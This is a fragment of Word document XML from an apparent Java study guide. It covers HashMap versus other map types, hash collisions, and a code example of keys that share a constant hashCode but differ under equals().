          </w:tcPr>
          <w:p w14:paraId="47596D6A" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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4CC76202" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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r>
      <w:tr w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w14:paraId="76501499" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F3C2C45" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="427B609B" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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igh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1235F8CC" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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lightly lower</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B965F75" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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derate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12D8F1EF" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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w</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27C61CEA" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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igh (for concurrent use)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79331861" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001D7F2E">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279AF90">
          <v:rect id="_x0000_i1529" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="383B4989" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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Use Case Guidelin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38"/>
        <w:gridCol w:w="1946"/>
      </w:tblGrid>
      <w:tr w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w14:paraId="49110A99" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5580CFD4" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="003A7EE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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49B1E7A9" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="003A7EE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Recommended Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w14:paraId="0FA48FDF" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DD05F02" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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ast access, no thread safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DD997E2" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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hMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w14:paraId="189A89FF" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37301E87" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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intain insertion order</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C0FE394" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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nkedHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w14:paraId="172B6B87" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BACBE52" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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orted map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D0E42F5" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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eeMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w14:paraId="7BECBD22" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77C8C832" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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read-safe (legacy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CB5222B" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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htable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w14:paraId="0BCEF0BE" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4420C8BF" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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read-safe (modern)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38C229EB" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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currentHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CA80716" w14:textId="66FCD84C" w:rsidR="0049206B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0049206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38456A5">
          <v:rect id="_x0000_i1530" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4C1150" w14:textId="6DE41F52" w:rsidR="0049206B" w:rsidRPr="00CE4B95" w:rsidRDefault="0049206B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="170" w:name="_Toc196307650"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What happens in a HashMap when multiple keys have the same hashCode()??</w:t>
      </w:r>
      <w:bookmarkEnd w:id="170"/>
    </w:p>
    <w:p w14:paraId="2B72F6AE" w14:textId="07BD5A28" w:rsidR="00ED56FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00ED56FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">If multiple keys return the same hashCode(), they will land in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>same bucket</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside the HashMap. This is known as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hash collision</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. To resolve this, Java uses the equals() method to check if the keys are actually the same or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746E2FEC" w14:textId="77777777" w:rsidR="00ED56FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00ED56FC" w:rsidP="00191593">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">If equals() returns true, the value is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>updated</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42317236" w14:textId="6716212E" w:rsidR="00ED56FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00ED56FC" w:rsidP="00191593">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">If equals() returns false, the new key-value pair is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>added to the same bucket</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (via a linked list or red-</w:t>
      </w:r>
      <w:r w:rsidR="00191593" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>black tree).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5239498C" w14:textId="6676A7DB" w:rsidR="00ED56FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00ED56F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DBA7DBE">
          <v:rect id="_x0000_i1531" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7552687C" w14:textId="2C398B67" w:rsidR="0081471A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C55C77">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="171" w:name="_Toc196307651"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can HashMap store different keys that have the same hashCode</w:t>
      </w:r>
      <w:r w:rsidR="0081471A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="171"/>
    </w:p>
    <w:p w14:paraId="757F59F3" w14:textId="7611AFB1" w:rsidR="0081471A" w:rsidRPr="00CE4B95" w:rsidRDefault="009A4BA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Yes, as long as their equals() method returns false, Java treats them as distinct keys, even if their hashCode() is the same.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425A0D02" w14:textId="0D188953" w:rsidR="0049206B" w:rsidRPr="00CE4B95" w:rsidRDefault="00531D55" w:rsidP="0049206B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D349FD4"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88"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> java</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util</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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E484ED"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88"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> java</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util</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Objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CC23C8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D858586"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MyKey</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166045AA"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riv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key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065D5863"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46148855"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MyKey</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key</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1CBF11D4"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thi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key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key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691BA989"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6543DD76"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7793D8E5"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Override hashCode to always return same value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF4D202"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34298AA4"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t</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> hashCod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38B88F6B"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return</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100</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B62CD8C"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387426E3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B04A0B0"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equals compares actual content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B95720D"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F454F11"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boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals</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Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> obj</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70F6F9B1"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f</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thi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obj</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return</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true</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD5F62F"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f</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obj </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instanceof</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MyKey</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return</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false</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24523EB8"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MyKey</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> other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MyKey</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obj</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023CE3ED"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return</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Object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equals</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thi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key</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other</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key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7500AEB8"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363BCED2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7A1027"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CA750B"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tring</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> toString</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09F90EC7"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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
